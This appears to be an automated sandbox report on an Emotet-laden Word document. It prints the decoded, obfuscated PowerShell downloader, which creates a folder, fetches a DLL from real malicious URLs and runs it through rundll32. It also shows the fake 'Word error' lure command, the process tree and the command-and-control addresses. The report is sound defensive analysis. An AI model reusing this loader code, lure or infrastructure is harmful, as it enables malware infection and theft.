Source: unknown Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 7_2_10010000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 7_2_10011C13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 7_2_1001106A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 7_2_10011874
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 7_2_10011C7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 7_2_10011CB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 7_2_1001190C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 7_2_10011980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 7_2_10013DAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 7_2_10014DB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 7_2_10013DE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 7_2_100109FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 7_2_10009A59
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 7_2_100112C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 7_2_10014F07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 7_2_10013F22
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 7_2_1000C727
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 7_2_10011B52
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 7_2_1001175D
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 7_2_1000E372
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: powershell.exe, 00000005.00000002.2093002580.0000000000137000.00000004.00000020.sdmp Binary or memory string: Sched.exe

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Behavior Graph ID: 337532
Sample: Doc.doc
Startdate: 08/01/2021
Architecture: WINDOWS
Score: 100

Sample-level signatures:

  • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Multi AV Scanner detection for domain / URL
  • Antivirus detection for URL or domain
  • 13 other signatures

Process tree (counters in parentheses are the graph's per-process figures as shown):

  • WINWORD.EXE (436 30)
      dropped: C:\Users\user\Desktop\~$Doc.doc, data
  • cmd.exe
      signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found
      started: powershell.exe (12 9); msg.exe
      • powershell.exe (12 9)
          DNS/IP: paulscomputing.com 216.218.207.98, ports 49167, 80, CENTRALUTAHUS, United States
          dropped: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll, PE32
          signatures: Powershell drops PE file
          started: rundll32.exe
          • rundll32.exe
              started: rundll32.exe (2)
              • rundll32.exe (2)
                  signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                  started: rundll32.exe (1), which in turn starts a further rundll32.exe (1) six more times; each of the seven rundll32.exe (1) instances in this chain carries the signature "Hides that the sample has been downloaded from the Internet (zone.identifier)"
      • msg.exe

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
167.71.148.58 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
216.218.207.98 | unknown | United States | 36103 | CENTRALUTAHUS | true
202.187.222.40 | unknown | Malaysia | 9930 | TTNET-MYTIMEdotComBerhadMY | true
184.66.18.83 | unknown | Canada | 6327 | SHAWCA | true

Contacted Domains

Name | IP | Active
paulscomputing.com | 216.218.207.98 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://paulscomputing.com/CraigsMagicSquare/H/ | true | 19% (Virustotal); Avira URL Cloud: malware | unknown
https://167.71.148.58:443/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/ | true | Avira URL Cloud: safe | unknown